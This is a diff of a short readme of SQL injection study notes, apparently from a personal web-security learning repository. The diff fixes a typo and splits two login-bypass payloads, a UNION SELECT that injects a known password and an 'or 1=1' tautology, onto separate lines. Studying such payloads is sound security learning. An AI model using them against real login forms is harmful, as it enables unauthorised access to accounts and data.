kymb0/web_study/sqli/readme.md

 # SQLi notes

 #### Bypass login
-`admin' UNION SELECT 'pass' AS password FROM admins WHERE '1' = '1` in username field and than `pass` in password field `' or 1 =1 LIMIT 1,1#`
+`admin' UNION SELECT 'pass' AS password FROM admins WHERE '1' = '1` in username field and then `pass` in password field
+`' or 1 =1 LIMIT 1,1#`

 #### To jump to other tables: